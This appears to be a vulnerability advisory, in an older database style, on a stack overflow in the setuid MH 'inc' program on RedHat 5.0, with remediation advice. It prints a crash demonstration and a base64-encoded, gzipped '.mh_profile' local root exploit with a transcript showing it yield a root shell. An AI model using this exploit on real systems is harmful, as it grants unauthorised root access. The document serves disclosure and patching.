COMMAND

    mh

SYSTEMS AFFECTED

    Linux RedHat 5.0

PROBLEM

    Cesar Tascon  Alvarez found  following.   Due to  lack of security
    checks there  is a  standard stack  smashing problem.   Local user
    can execute code as root.  Let's see:

        [tascon@archivald]$ id
        uid=500(tascon) gid=500(tascon) groups=500(tascon),100(users)
        [tascon@archivald]$ cat /etc/redhat-release
        release 5.0 (Hurricane)
        [tascon@archivald]$ ls -l /usr/bin/mh/inc
        -rwsr-sr-x   1 root     mail        82972 Oct 15 18:06 /usr/bin/mh/inc
        [tascon@archivald]$ /usr/bin/mh/inc
        inc: no mail to incorporate
        [tascon@archivald]$ /usr/bin/mh/inc -host XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]
        XXXXX      <---- (2000 X's here)
        Segmentation fault
        ^^^^^^^^^^^^^^^^^^   Dangerous isn't it?

    Local exploit  exists for  that option.   Note that  MH isn't even
    configured.  It's as the installation of RedHat 5.0 left it.  Note
    also that MH is intalled by deffect with RedHat 5.0.

    Catalin Mitrofan posted an exploit for linux mh ver 6.8.4-5:

        host (user):~>. .mh_profile
        bash#

    ---490605465-831311219-890656803=:30627
    Content-Type: APPLICATION/x-gunzip; name=".mh_profile.gz"
    Content-Transfer-Encoding: BASE64
    Content-ID: <Pine.LNX.3.96.980323144003.30627B@lspvs.sorosis.ro>
    Content-Description:

    H4sICPNVFjUCAy5taF9wcm9maWxlAO3cP2vbQBiAcTqUBsd71td/hpg2cjUV
    DCYJIS5ePNRt8NTalRWfqOQzOslutozVYPBHMWTsUNNOGQzZ8wUKHTt1Ulu7
    timYkiVTnx88B6c7SV/gpEKu/Nbrl43KODoIOv1utRybcHEtUOXA9Bz1LlNw
    37vOm0h5xrIseSaO6oQms75YXT2iEPte4EVy0HTk6a/1gQ4jaVUnAAAAAAAA
    AAAAAAAAAAAAAAD8H74dvbZnH2qPkuFOUstOD5PP9u3Vrn09v0xuTo5Xoz1L
    vkz3JhN7NrUW427yfdzYGZ9l55dfP6ZpWlyf2V+dzm/WnzeOX756cVrNV0q1
    UAeVoHvkm8HQWEaH2njGCrXURemBKzLyfF96biQXOpaOhFpHYpTr+7+/C9gX
    71z6OnoiUXghFUcFuis67j020h4pz1Gy/JygLblcTkry8Ef66T57kFr3+wIi
    IiIiIiIiIiIiIiIiIiJals8U//x4cMuJhFK+uJ79a1/ljvsOtu6L+8aNZHMy
    Yjn/e3Vz23Le+gmH4mwTOFEAAA==
    ---490605465-831311219-890656803=:30627--

SOLUTION

    Uninstall this package  or remove the  suid-bit until you  install
    patch.   Another solution  might be  to recompile  MH without  POP
    support,  however  that  is  just  a band-aid solution and doesn't
    really fix the problem with  RedHat's libc.  Remove suid  bit from
    inc.  inc  only needs to  be setuid for  RPOP, a non-standard  POP
    authentication  method  which  uses rlogin/rsh-like authentication
    via ruserok().  You can still do POP with either username/password
    or APOP authentication with a  non-setuid inc -- you just  have to
    type your password each time.  Fix can be obtained on:

        ftp.redhat.com

    It appears that  the Debian mh_6.8.4-17  *is* vulnerable, but  not
    with Catalin's exploit (would probably work with some hacking).